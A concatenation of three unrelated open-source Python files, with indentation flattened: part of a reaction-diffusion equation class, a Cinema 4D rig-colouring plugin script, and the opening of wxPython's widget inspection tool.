def __init__(self, eqn_config):
super(ReactionDiffusion, self).__init__(eqn_config)
self._kappa = 0.6
self.lambd = 1 / np.sqrt(self.dim)
self.x_init = np.zeros(self.dim)
self.y_init = 1 + self._kappa + np.sin(self.lambd * np.sum(self.x_init)) * np.exp(
-self.lambd * self.lambd * self.dim * self.total_time / 2)
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = x_sample[:, :, i] + dw_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
exp_term = tf.exp((self.lambd ** 2) * self.dim * (t - self.total_time) / 2)
sin_term = tf.sin(self.lambd * tf.reduce_sum(x, 1, keepdims=True))
temp = y - self._kappa - 1 - sin_term * exp_term
return tf.minimum(tf.constant(1.0, dtype=tf.float64), tf.square(temp))
def g_tf(self, t, x):
return 1 + self._kappa + tf.sin(self.lambd * tf.reduce_sum(x, 1, keepdims=True))
| 2.390625 | 2 |
Cinema 4D/appdir_common/plugins/DazToC4D/lib/CustomColors.py | daz3d/DazToC4D | 16 | 12761607 | <gh_stars>10-100
import c4d
from c4d import documents
from random import randint
class randomColors():
IKMobjList = []
def selchildren(self, obj, next): # Scan obj hierarchy and select children
while obj and obj != next:
# global IKMobjList
self.IKMobjList.append(obj)
self.selchildren(obj.GetDown(), next)
obj = obj.GetNext()
return self.IKMobjList
def get_random_color(self):
""" Return a random color as c4d.Vector """
def get_random_value():
""" Return a random value between 0.0 and 1.0 """
return randint(0, 255) / 256.0
return c4d.Vector(get_random_value(), get_random_value(), get_random_value())
def randomNullsColor(self, parentName, randomCol=1, rigColor1=0, rigColor2=0):
doc = documents.GetActiveDocument()
try:
if randomCol == 1:
rigColor1 = self.get_random_color() # c4d.Vector(0,2,0)
rigColor2 = self.get_random_color() # c4d.Vector(1,0,0)
self.IKMobjList = []
parentOb = parentName
for o in self.selchildren(parentOb, parentOb.GetNext()):
o[c4d.ID_BASEOBJECT_USECOLOR] = 2
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1
if 'HAND' in o.GetName() or \
'Pelvis' in o.GetName() or \
'Platform' in o.GetName() or \
'Head' in o.GetName():
o[c4d.ID_BASEOBJECT_USECOLOR] = 2
# o[c4d.ID_CA_JOINT_OBJECT_ICONCOL] = 1
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
except:
pass
c4d.EventAdd()
def randomPoleColors(self, parentName, randomCol=1, rigColor1=0, rigColor2=0):
doc = documents.GetActiveDocument()
try:
if randomCol == 1:
rigColor1 = self.get_random_color() # c4d.Vector(0,2,0)
rigColor2 = self.get_random_color() # c4d.Vector(1,0,0)
parentOb = parentName
for o in self.selchildren(parentOb, parentOb.GetNext()):
try:
tag = o.GetFirstTag()
tag[c4d.ID_CA_IK_TAG_DRAW_POLE_COLOR] = rigColor2
except:
pass
c4d.EventAdd()
except:
pass
def randomRigColor(self, parentName, randomCol=1, rigColor1=0, rigColor2=0):
doc = documents.GetActiveDocument()
try:
if randomCol == 1:
rigColor1 = self.get_random_color() # c4d.Vector(0,2,0)
rigColor2 = self.get_random_color() # c4d.Vector(1,0,0)
parentOb = parentName
self.IKMobjList = []
for o in self.selchildren(parentOb, parentOb.GetNext()):
o[c4d.ID_BASEOBJECT_USECOLOR] = 2
if "Head" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Neck" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Chest" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = (rigColor2 * 0.9) + (rigColor1 * 0.1)
if "Spine" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = (rigColor2 * 0.7) + (rigColor1 * 0.3)
if "Abdomen" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = (rigColor2 * 0.7) + (rigColor1 * 0.3)
if "Spine2" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = (rigColor2 * 0.7) + (rigColor1 * 0.3)
if "Collar" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Arm" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "ForeArm" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Hand" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Index" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Middle" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Ring" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Pink" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Thumb" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Finger" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Thumb" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Pelvis" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = (rigColor2 * 0.2) + (rigColor1 * 0.8)
if "LegUpper" in o.GetName() or "jUpLeg" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1 * 0.7
if "LegLower" in o.GetName() or "jLeg" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1 * 0.6
if "Foot" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1 * 0.3
if "Toes" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1 * 0.3
if "ToesEnd" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1 * 0.2
c4d.EventAdd()
except Exception as e:
print(e)
# pass
| 2.375 | 2 |
Lib/site-packages/wx/lib/inspection.py | 15008477526/- | 1 | 12761608 | <reponame>15008477526/-
#----------------------------------------------------------------------------
# Name: wx.lib.inspection
# Purpose: A widget inspection tool that allows easy introspection of
# all the live widgets and sizers in an application.
#
# Author: <NAME>
#
# Created: 26-Jan-2007
# Copyright: (c) 2007-2018 by Total Control Software
# Licence: wxWindows license
#
# Tags: py3-port, phoenix-port, documented
#----------------------------------------------------------------------------
# NOTE: This class was originally based on ideas sent to the
# wxPython-users mail list by <NAME>. See also
# wx.lib.mixins.inspect for a class that can be mixed-in with wx.App
# to provide Hot-Key access to the inspection tool.
"""
This modules provides the :class:`~wx.lib.inspection.InspectionTool` and
everything else needed to provide the Widget Inspection Tool (WIT).
"""
import wx
import wx.py
import wx.stc
#import wx.aui as aui
import wx.lib.agw.aui as aui
import six
import wx.lib.utils as utils
import sys
import inspect
#----------------------------------------------------------------------------
class InspectionTool:
"""
The :class:`InspectionTool` is a singleton that manages creating and
showing an :class:`InspectionFrame`.
"""
# Note: This is the Borg design pattern which ensures that all
# instances of this class are actually using the same set of
# instance data. See
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66531
__shared_state = None
def __init__(self):
if not InspectionTool.__shared_state:
InspectionTool.__shared_state = self.__dict__
else:
self.__dict__ = InspectionTool.__shared_state
if not hasattr(self, 'initialized'):
self.initialized = False
def Init(self, pos=wx.DefaultPosition, size=wx.Size(850,700),
config=None, locals=None, app=None):
"""
Init is used to set some parameters that will be used later
when the inspection tool is shown. Suitable defaults will be
used for all of these parameters if they are not provided.
:param `pos`: The default position to show the frame at
:param `size`: The default size of the frame
:param `config`: A :class:`Config` object to be used to store layout
and other info to when the inspection frame is closed.
This info will be restored the next time the inspection
frame is used.
:param `locals`: A dictionary of names to be added to the PyCrust
namespace.
:param `app`: A reference to the :class:`App` object.
"""
self._frame = None
self._pos = pos
self._size = size
self._config = config
self._locals = locals
self._app = app
if not self._app:
self._app = wx.GetApp()
self.initialized = True
def Show(self, selectObj=None, refreshTree=False):
"""
Creates the inspection frame if it hasn't been already, and
raises it if neccessary.
:param `selectObj`: Pass a widget or sizer to have that object be
preselected in widget tree.
:param boolean `refreshTree`: rebuild the widget tree, default False
"""
if not self.initialized:
self.Init()
parent = self._app.GetTopWindow()
if not selectObj:
selectObj = parent
if not self._frame:
self._frame = InspectionFrame( parent=parent,
pos=self._pos,
size=self._size,
config=self._config,
locals=self._locals,
app=self._app)
if selectObj:
self._frame.SetObj(selectObj)
if refreshTree:
self._frame.RefreshTree()
self._frame.Show()
if self._frame.IsIconized():
self._frame.Iconize(False)
self._frame.Raise()
#----------------------------------------------------------------------------
class InspectionFrame(wx.Frame):
"""
This class is the frame that holds the wxPython inspection tools.
The toolbar and AUI splitters/floating panes are also managed
here. The contents of the tool windows are handled by other
classes.
"""
def __init__(self, wnd=None, locals=None, config=None,
app=None, title="wxPython Widget Inspection Tool",
*args, **kw):
kw['title'] = title
wx.Frame.__init__(self, *args, **kw)
self.SetExtraStyle(wx.WS_EX_BLOCK_EVENTS)
self.includeSizers = False
self.started = False
self.SetIcon(Icon.GetIcon())
self.MakeToolBar()
panel = wx.Panel(self, size=self.GetClientSize())
# tell FrameManager to manage this frame
self.mgr = aui.AuiManager(panel,
aui.AUI_MGR_DEFAULT
| aui.AUI_MGR_TRANSPARENT_DRAG
| aui.AUI_MGR_ALLOW_ACTIVE_PANE)
# make the child tools
self.tree = InspectionTree(panel, size=(100,300))
self.info = InspectionInfoPanel(panel,
style=wx.NO_BORDER,
)
if not locals:
locals = {}
myIntroText = (
"Python %s on %s, wxPython %s\n"
"NOTE: The 'obj' variable refers to the object selected in the tree."
% (sys.version.split()[0], sys.platform, wx.version()))
self.crust = wx.py.crust.Crust(panel, locals=locals,
intro=myIntroText,
showInterpIntro=False,
style=wx.NO_BORDER,
)
self.locals = self.crust.shell.interp.locals
self.crust.shell.interp.introText = ''
self.locals['obj'] = self.obj = wnd
self.locals['app'] = app
self.locals['wx'] = wx
wx.CallAfter(self._postStartup)
# put the chlid tools in AUI panes
self.mgr.AddPane(self.info,
aui.AuiPaneInfo().Name("info").Caption("Object Info").
CenterPane().CaptionVisible(True).
CloseButton(False).MaximizeButton(True)
)
self.mgr.AddPane(self.tree,
aui.AuiPaneInfo().Name("tree").Caption("Widget Tree").
CaptionVisible(True).Left().Dockable(True).Floatable(True).
BestSize((280,200)).CloseButton(False).MaximizeButton(True)
)
self.mgr.AddPane(self.crust,
aui.AuiPaneInfo().Name("crust").Caption("PyCrust").
CaptionVisible(True).Bottom().Dockable(True).Floatable(True).
BestSize((400,200)).CloseButton(False).MaximizeButton(True)
)
self.mgr.Update()
if config is None:
config = wx.Config('wxpyinspector')
self.config = config
self.Bind(wx.EVT_CLOSE, self.OnClose)
if self.Parent:
tlw = self.Parent.GetTopLevelParent()
tlw.Bind(wx.EVT_CLOSE, self.OnClose)
self.LoadSettings(self.config)
self.crust.shell.lineNumbers = False
self.crust.shell.setDisplayLineNumbers(False)
self.crust.shell.SetMarginWidth(1, 0)
def MakeToolBar(self):
tbar = self.CreateToolBar(wx.TB_HORIZONTAL | wx.TB_FLAT | wx.TB_TEXT | wx.NO_BORDER )
tbar.SetToolBitmapSize((24,24))
refreshBmp = Refresh.GetBitmap()
findWidgetBmp = Find.GetBitmap()
showSizersBmp = ShowSizers.GetBitmap()
expandTreeBmp = ExpandTree.GetBitmap()
collapseTreeBmp = CollapseTree.GetBitmap()
highlightItemBmp = HighlightItem.GetBitmap()
evtWatcherBmp = EvtWatcher.GetBitmap()
toggleFillingBmp = ShowFilling.GetBitmap()
refreshTool = tbar.AddTool(-1, 'Refresh', refreshBmp,
shortHelp = 'Refresh widget tree (F1)')
findWidgetTool = tbar.AddTool(-1, 'Find', findWidgetBmp,
shortHelp='Find new target widget. (F2) Click here and\nthen on another widget in the app.')
showSizersTool = tbar.AddTool(-1, 'Sizers', showSizersBmp,
shortHelp='Include sizers in widget tree (F3)',
kind=wx.ITEM_CHECK)
expandTreeTool = tbar.AddTool(-1, 'Expand', expandTreeBmp,
shortHelp='Expand all tree items (F4)')
collapseTreeTool = tbar.AddTool(-1, 'Collapse', collapseTreeBmp,
shortHelp='Collapse all tree items (F5)')
highlightItemTool = tbar.AddTool(-1, 'Highlight', highlightItemBmp,
shortHelp='Attempt to highlight live item (F6)')
evtWatcherTool = tbar.AddTool(-1, 'Events', evtWatcherBmp,
shortHelp='Watch the events of the selected item (F7)')
toggleFillingTool = tbar.AddTool(-1, 'Filling', toggleFillingBmp,
shortHelp='Show PyCrust \'filling\' (F8)',
kind=wx.ITEM_CHECK)
tbar.Realize()
self.Bind(wx.EVT_TOOL, self.OnRefreshTree, refreshTool)
self.Bind(wx.EVT_TOOL, self.OnFindWidget, findWidgetTool)
self.Bind(wx.EVT_TOOL, self.OnShowSizers, showSizersTool)
self.Bind(wx.EVT_TOOL, self.OnExpandTree, expandTreeTool)
self.Bind(wx.EVT_TOOL, self.OnCollapseTree, collapseTreeTool)
self.Bind(wx.EVT_TOOL, self.OnHighlightItem, highlightItemTool)
self.Bind(wx.EVT_TOOL, self.OnWatchEvents, evtWatcherTool)
self.Bind(wx.EVT_TOOL, self.OnToggleFilling, toggleFillingTool)
self.Bind(wx.EVT_UPDATE_UI, self.OnShowSizersUI, showSizersTool)
self.Bind(wx.EVT_UPDATE_UI, self.OnWatchEventsUI, evtWatcherTool)
self.Bind(wx.EVT_UPDATE_UI, self.OnToggleFillingUI, toggleFillingTool)
tbl = wx.AcceleratorTable(
[(wx.ACCEL_NORMAL, wx.WXK_F1, refreshTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F2, findWidgetTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F3, showSizersTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F4, expandTreeTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F5, collapseTreeTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F6, highlightItemTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F7, evtWatcherTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F8, toggleFillingTool.GetId()),
])
self.SetAcceleratorTable(tbl)
def _postStartup(self):
if self.crust.ToolsShown():
self.crust.ToggleTools()
self.UpdateInfo()
self.started = True
def OnClose(self, evt):
evt.Skip()
if not self:
return
self.SaveSettings(self.config)
if hasattr(self, 'mgr'):
self.mgr.UnInit()
del self.mgr
if self.Parent:
tlw = self.Parent.GetTopLevelParent()
tlw.Unbind(wx.EVT_CLOSE, handler=self.OnClose)
def UpdateInfo(self):
self.info.UpdateInfo(self.obj)
def SetObj(self, obj):
if self.obj is obj:
return
self.locals['obj'] = self.obj = obj
self.UpdateInfo()
if not self.tree.built:
self.tree.BuildTree(obj, includeSizers=self.includeSizers)
else:
self.tree.SelectObj(obj)
def HighlightCurrentItem(self):
"""
Draw a highlight rectangle around the item represented by the
current tree selection.
"""
if not hasattr(self, 'highlighter'):
self.highlighter = _InspectionHighlighter()
self.highlighter.HighlightCurrentItem(self.tree)
def RefreshTree(self):
self.tree.BuildTree(self.obj, includeSizers=self.includeSizers)
def OnRefreshTree(self, evt):
self.RefreshTree()
self.UpdateInfo()
def OnFindWidget(self, evt):
self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
self.Bind(wx.EVT_MOUSE_CAPTURE_LOST, self.OnCaptureLost)
self.CaptureMouse()
self.finding = wx.BusyInfo("Click on any widget in the app...")
def OnCaptureLost(self, evt):
self.Unbind(wx.EVT_LEFT_DOWN)
self.Unbind(wx.EVT_MOUSE_CAPTURE_LOST)
del self.finding
def OnLeftDown(self, evt):
self.ReleaseMouse()
wnd, pt = wx.FindWindowAtPointer()
if wnd is not None:
self.SetObj(wnd)
else:
wx.Bell()
self.OnCaptureLost(evt)
def OnShowSizers(self, evt):
self.includeSizers = not self.includeSizers
self.RefreshTree()
def OnExpandTree(self, evt):
current = self.tree.GetSelection()
self.tree.ExpandAll()
self.tree.EnsureVisible(current)
def OnCollapseTree(self, evt):
current = self.tree.GetSelection()
self.tree.CollapseAll()
self.tree.EnsureVisible(current)
self.tree.SelectItem(current)
def OnHighlightItem(self, evt):
self.HighlightCurrentItem()
def OnWatchEvents(self, evt):
item = self.tree.GetSelection()
obj = self.tree.GetItemData(item)
if isinstance(obj, wx.Window):
import wx.lib.eventwatcher as ew
watcher = ew.EventWatcher(self)
watcher.watch(obj)
watcher.Show()
def OnWatchEventsUI(self, evt):
item = self.tree.GetSelection()
if item:
obj = self.tree.GetItemData(item)
evt.Enable(isinstance(obj, wx.Window))
def OnToggleFilling(self, evt):
self.crust.ToggleTools()
def OnShowSizersUI(self, evt):
evt.Check(self.includeSizers)
def OnToggleFillingUI(self, evt):
if self.started:
evt.Check(self.crust.ToolsShown())
def LoadSettings(self, config):
self.crust.LoadSettings(config)
self.info.LoadSettings(config)
pos = wx.Point(config.ReadInt('Window/PosX', -1),
config.ReadInt('Window/PosY', -1))
size = wx.Size(config.ReadInt('Window/Width', -1),
config.ReadInt('Window/Height', -1))
self.SetSize(size)
self.Move(pos)
rect = utils.AdjustRectToScreen(self.GetRect())
self.SetRect(rect)
perspective = config.Read('perspective', '')
if perspective:
try:
self.mgr.LoadPerspective(perspective)
except wx.PyAssertionError:
# ignore bad perspective string errors
pass
self.includeSizers = config.ReadBool('includeSizers', False)
def SaveSettings(self, config):
self.crust.SaveSettings(config)
self.info.SaveSettings(config)
if not self.IsIconized() and not self.IsMaximized():
w, h = self.GetSize()
config.WriteInt('Window/Width', w)
config.WriteInt('Window/Height', h)
px, py = self.GetPosition()
config.WriteInt('Window/PosX', px)
config.WriteInt('Window/PosY', py)
if hasattr(self, "mgr"):
perspective = self.mgr.SavePerspective()
config.Write('perspective', perspective)
config.WriteBool('includeSizers', self.includeSizers)
#---------------------------------------------------------------------------
# should inspection frame (and children) be includeed in the tree?
INCLUDE_INSPECTOR = True
USE_CUSTOMTREECTRL = False
if USE_CUSTOMTREECTRL:
import wx.lib.agw.customtreectrl as CT
TreeBaseClass = CT.CustomTreeCtrl
else:
TreeBaseClass = wx.TreeCtrl
class InspectionTree(TreeBaseClass):
"""
All of the widgets in the app, and optionally their sizers, are
loaded into this tree.
"""
def __init__(self, *args, **kw):
#s = kw.get('style', 0)
#kw['style'] = s | wx.TR_DEFAULT_STYLE | wx.TR_HIDE_ROOT
TreeBaseClass.__init__(self, *args, **kw)
self.roots = []
self.built = False
self.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelectionChanged)
self.toolFrame = wx.GetTopLevelParent(self)
if 'wxMac' in wx.PlatformInfo:
self.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
def BuildTree(self, startWidget, includeSizers=False, expandFrame=False):
if self.GetCount():
self.DeleteAllItems()
self.roots = []
self.built = False
realRoot = self.AddRoot('Top-level Windows')
for w in wx.GetTopLevelWindows():
if w is wx.GetTopLevelParent(self) and not INCLUDE_INSPECTOR:
continue
root = self._AddWidget(realRoot, w, includeSizers)
self.roots.append(root)
# Expand the subtree containing the startWidget, and select it.
if not startWidget or not isinstance(startWidget, wx.Window):
startWidget = wx.GetApp().GetTopWindow()
if expandFrame:
top = wx.GetTopLevelParent(startWidget)
topItem = self.FindWidgetItem(top)
if topItem:
self.ExpandAllChildren(topItem)
self.built = True
self.SelectObj(startWidget)
def _AddWidget(self, parentItem, widget, includeSizers):
text = self.GetTextForWidget(widget)
item = self.AppendItem(parentItem, text)
self.SetItemData(item, widget)
# Add the sizer and widgets in the sizer, if we're showing them
widgetsInSizer = []
if includeSizers and widget.GetSizer() is not None:
widgetsInSizer = self._AddSizer(item, widget.GetSizer())
# Add any children not in the sizer, or all children if we're
# not showing the sizers
for child in widget.GetChildren():
if (not child in widgetsInSizer and
(not child.IsTopLevel() or
isinstance(child, wx.PopupWindow))):
self._AddWidget(item, child, includeSizers)
return item
def _AddSizer(self, parentItem, sizer):
widgets = []
text = self.GetTextForSizer(sizer)
item = self.AppendItem(parentItem, text)
self.SetItemData(item, sizer)
self.SetItemTextColour(item, "blue")
for si in sizer.GetChildren():
if si.IsWindow():
w = si.GetWindow()
self._AddWidget(item, w, True)
widgets.append(w)
elif si.IsSizer():
ss = si.GetSizer()
widgets += self._AddSizer(item, ss)
ss._parentSizer = sizer
else:
i = self.AppendItem(item, "Spacer")
self.SetItemData(i, si)
self.SetItemTextColour(i, "blue")
return widgets
def FindWidgetItem(self, widget):
"""
Find the tree item for a widget.
"""
for item in self.roots:
found = self._FindWidgetItem(widget, item)
if found:
return found
return None
def _FindWidgetItem(self, widget, item):
if self.GetItemData(item) is widget:
return item
child, cookie = self.GetFirstChild(item)
while child:
found = self._FindWidgetItem(widget, child)
if found:
return found
child, cookie = self.GetNextChild(item, cookie)
return None
def GetTextForWidget(self, widget):
"""
Returns the string to be used in the tree for a widget
"""
if hasattr(widget, 'GetName'):
return "%s (\"%s\")" % (widget.__class__.__name__, widget.GetName())
return widget.__class__.__name__
def GetTextForSizer(self, sizer):
"""
Returns the string to be used in the tree for a sizer
"""
return "%s" % sizer.__class__.__name__
def SelectObj(self, obj):
item = self.FindWidgetItem(obj)
if item:
self.EnsureVisible(item)
self.SelectItem(item)
def OnSelectionChanged(self, evt):
item = evt.GetItem()
if item:
obj = self.GetItemData(item)
self.toolFrame.SetObj(obj)
#---------------------------------------------------------------------------
class InspectionInfoPanel(wx.stc.StyledTextCtrl):
"""
Used to display information about the currently selected items.
Currently just a read-only :class:`stc.StyledTextCtrl` with some plain
text. Should probably add some styles to make things easier to
read.
"""
def __init__(self, *args, **kw):
wx.stc.StyledTextCtrl.__init__(self, *args, **kw)
from wx.py.editwindow import FACES
self.StyleSetSpec(wx.stc.STC_STYLE_DEFAULT,
"face:%(mono)s,size:%(size)d,back:%(backcol)s" % FACES)
self.StyleClearAll()
self.SetReadOnly(True)
self.SetMarginType(1, 0)
self.SetMarginWidth(1, 0)
self.SetSelForeground(True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHTTEXT))
self.SetSelBackground(True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))
def LoadSettings(self, config):
zoom = config.ReadInt('View/Zoom/Info', 0)
self.SetZoom(zoom)
def SaveSettings(self, config):
config.WriteInt('View/Zoom/Info', self.GetZoom())
def UpdateInfo(self, obj):
st = []
if not obj:
st.append("Item is None or has been destroyed.")
elif isinstance(obj, wx.Window):
st += self.FmtWidget(obj)
elif isinstance(obj, wx.Sizer):
st += self.FmtSizer(obj)
elif isinstance(obj, wx.SizerItem):
st += self.FmtSizerItem(obj)
self.SetReadOnly(False)
self.SetText('\n'.join(st))
self.SetReadOnly(True)
def Fmt(self, name, value):
if isinstance(value, six.string_types):
return " %s = '%s'" % (name, value)
else:
return " %s = %s" % (name, value)
def FmtWidget(self, obj):
def _countChildren(children):
count = 0
for child in children:
if not child.IsTopLevel():
count += 1
count += _countChildren(child.GetChildren())
return count
def _countAllChildren(children):
count = 0
for child in children:
count += 1
count += _countAllChildren(child.GetChildren())
return count
count = len([c for c in obj.GetChildren() if not c.IsTopLevel()])
rcount = _countChildren(obj.GetChildren())
tlwcount = _countAllChildren(obj.GetChildren())
st = ["Widget:"]
if hasattr(obj, 'GetName'):
st.append(self.Fmt('name', obj.GetName()))
st.append(self.Fmt('class', obj.__class__))
st.append(self.Fmt('bases', obj.__class__.__bases__))
st.append(self.Fmt('module', inspect.getmodule(obj)))
if hasattr(obj, 'this'):
st.append(self.Fmt('this', repr(obj.this)))
st.append(self.Fmt('id', obj.GetId()))
st.append(self.Fmt('style', obj.GetWindowStyle()))
st.append(self.Fmt('pos', obj.GetPosition()))
st.append(self.Fmt('size', obj.GetSize()))
st.append(self.Fmt('minsize', obj.GetMinSize()))
st.append(self.Fmt('bestsize', obj.GetBestSize()))
st.append(self.Fmt('client size', obj.GetClientSize()))
st.append(self.Fmt('virtual size',obj.GetVirtualSize()))
st.append(self.Fmt('IsEnabled', obj.IsEnabled()))
st.append(self.Fmt('IsShown', obj.IsShown()))
st.append(self.Fmt('IsFrozen', obj.IsFrozen()))
st.append(self.Fmt('fg color', obj.GetForegroundColour()))
st.append(self.Fmt('bg color', obj.GetBackgroundColour()))
st.append(self.Fmt('label', obj.GetLabel()))
if hasattr(obj, 'GetTitle'):
st.append(self.Fmt('title', obj.GetTitle()))
if hasattr(obj, 'GetValue'):
try:
st.append(self.Fmt('value', obj.GetValue()))
except Exception:
pass
st.append(' child count = %d (direct) %d (recursive) %d (include TLWs)' %
(count, rcount, tlwcount))
if obj.GetContainingSizer() is not None:
st.append('')
sizer = obj.GetContainingSizer()
st += self.FmtSizerItem(sizer.GetItem(obj))
return st
def FmtSizerItem(self, obj):
if obj is None:
return ['SizerItem: None']
st = ['SizerItem:']
st.append(self.Fmt('proportion', obj.GetProportion()))
st.append(self.Fmt('flag',
FlagsFormatter(itemFlags, obj.GetFlag())))
st.append(self.Fmt('border', obj.GetBorder()))
st.append(self.Fmt('pos', obj.GetPosition()))
st.append(self.Fmt('size', obj.GetSize()))
st.append(self.Fmt('minsize', obj.GetMinSize()))
st.append(self.Fmt('ratio', obj.GetRatio()))
st.append(self.Fmt('IsWindow', obj.IsWindow()))
st.append(self.Fmt('IsSizer', obj.IsSizer()))
st.append(self.Fmt('IsSpacer', obj.IsSpacer()))
st.append(self.Fmt('IsShown', obj.IsShown()))
if isinstance(obj, wx.GBSizerItem):
st.append(self.Fmt('cellpos', obj.GetPos()))
st.append(self.Fmt('cellspan', obj.GetSpan()))
st.append(self.Fmt('endpos', obj.GetEndPos()))
return st
def FmtSizer(self, obj):
st = ['Sizer:']
st.append(self.Fmt('class', obj.__class__))
if hasattr(obj, 'this'):
st.append(self.Fmt('this', repr(obj.this)))
st.append(self.Fmt('pos', obj.GetPosition()))
st.append(self.Fmt('size', obj.GetSize()))
st.append(self.Fmt('minsize', obj.GetMinSize()))
if isinstance(obj, wx.BoxSizer):
st.append(self.Fmt('orientation',
FlagsFormatter(orientFlags, obj.GetOrientation())))
if isinstance(obj, wx.GridSizer):
st.append(self.Fmt('cols', obj.GetCols()))
st.append(self.Fmt('rows', obj.GetRows()))
st.append(self.Fmt('vgap', obj.GetVGap()))
st.append(self.Fmt('hgap', obj.GetHGap()))
if isinstance(obj, wx.FlexGridSizer):
st.append(self.Fmt('rowheights', obj.GetRowHeights()))
st.append(self.Fmt('colwidths', obj.GetColWidths()))
st.append(self.Fmt('flexdir',
FlagsFormatter(orientFlags, obj.GetFlexibleDirection())))
st.append(self.Fmt('nonflexmode',
FlagsFormatter(flexmodeFlags, obj.GetNonFlexibleGrowMode())))
if isinstance(obj, wx.GridBagSizer):
st.append(self.Fmt('emptycell', obj.GetEmptyCellSize()))
if hasattr(obj, '_parentSizer'):
st.append('')
st += self.FmtSizerItem(obj._parentSizer.GetItem(obj))
return st
class FlagsFormatter(object):
def __init__(self, d, val):
self.d = d
self.val = val
def __str__(self):
st = []
for k in self.d.keys():
if self.val & k:
st.append(self.d[k])
if st:
return '|'.join(st)
else:
return '0'
orientFlags = {
wx.HORIZONTAL : 'wx.HORIZONTAL',
wx.VERTICAL : 'wx.VERTICAL',
}
itemFlags = {
wx.TOP : 'wx.TOP',
wx.BOTTOM : 'wx.BOTTOM',
wx.LEFT : 'wx.LEFT',
wx.RIGHT : 'wx.RIGHT',
# wx.ALL : 'wx.ALL',
wx.EXPAND : 'wx.EXPAND',
# wx.GROW : 'wx.GROW',
wx.SHAPED : 'wx.SHAPED',
wx.STRETCH_NOT : 'wx.STRETCH_NOT',
# wx.ALIGN_CENTER : 'wx.ALIGN_CENTER',
wx.ALIGN_LEFT : 'wx.ALIGN_LEFT',
wx.ALIGN_RIGHT : 'wx.ALIGN_RIGHT',
wx.ALIGN_TOP : 'wx.ALIGN_TOP',
wx.ALIGN_BOTTOM : 'wx.ALIGN_BOTTOM',
wx.ALIGN_CENTER_VERTICAL : 'wx.ALIGN_CENTER_VERTICAL',
wx.ALIGN_CENTER_HORIZONTAL : 'wx.ALIGN_CENTER_HORIZONTAL',
wx.ADJUST_MINSIZE : 'wx.ADJUST_MINSIZE',
wx.FIXED_MINSIZE : 'wx.FIXED_MINSIZE',
}
flexmodeFlags = {
wx.FLEX_GROWMODE_NONE : 'wx.FLEX_GROWMODE_NONE',
wx.FLEX_GROWMODE_SPECIFIED : 'wx.FLEX_GROWMODE_SPECIFIED',
wx.FLEX_GROWMODE_ALL : 'wx.FLEX_GROWMODE_ALL',
}
#---------------------------------------------------------------------------
class _InspectionHighlighter(object):
"""
All the highlighting code. A separate class to help reduce the
clutter in InspectionFrame.
"""
# should non TLWs be flashed too? Otherwise use a highlight rectangle
flashAll = False
color1 = 'red' # for widgets and sizers
color2 = 'red' # for item boundaries in sizers
color3 = '#00008B' # for items in sizers
highlightTime = 3000 # how long to display the highlights
# how to draw it
useOverlay = 'wxMac' in wx.PlatformInfo or 'gtk3' in wx.PlatformInfo
def __init__(self):
if self.useOverlay:
self.overlay = wx.Overlay()
def HighlightCurrentItem(self, tree):
"""
Draw a highlight rectangle around the item represented by the
current tree selection.
"""
item = tree.GetSelection()
obj = tree.GetItemData(item)
if isinstance(obj, wx.Window):
self.HighlightWindow(obj)
elif isinstance(obj, wx.Sizer):
self.HighlightSizer(obj)
elif isinstance(obj, wx.SizerItem): # Spacer
pItem = tree.GetItemParent(item)
sizer = tree.GetItemData(pItem)
self.HighlightSizerItem(obj, sizer)
else:
raise RuntimeError("unknown object type: %s" % obj.__class__.__name__)
def HighlightWindow(self, win):
rect = win.GetRect()
tlw = win.GetTopLevelParent()
if self.flashAll or tlw is win:
self.FlickerTLW(win)
return
else:
pos = self.FindHighlightPos(tlw, win.ClientToScreen((0,0)))
